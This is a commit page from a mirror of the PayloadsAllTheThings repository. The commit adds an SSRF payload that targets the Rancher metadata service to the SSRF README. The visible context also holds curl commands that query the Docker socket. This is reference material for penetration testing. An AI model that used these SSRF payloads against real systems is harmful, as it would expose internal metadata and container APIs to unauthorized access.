gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-09 11:44:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #26 from Techbrunch/patch-1

Browse Source 
Add Rancher Metadata Service
This commit is contained in:
Swissky
2018-10-08 23:02:35 +02:00
committed by GitHub
parent 35d4139373 78103d13a1
commit ea1c3a7ccb
1 changed files with 8 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
SSRF injection/README.md
View File

@@ -436,6 +436,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
### SSRF URL for Rancher
```powershell
curl http://rancher-metadata/<version>/<path>
```
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
## Thanks to
@@ -451,4 +458,4 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)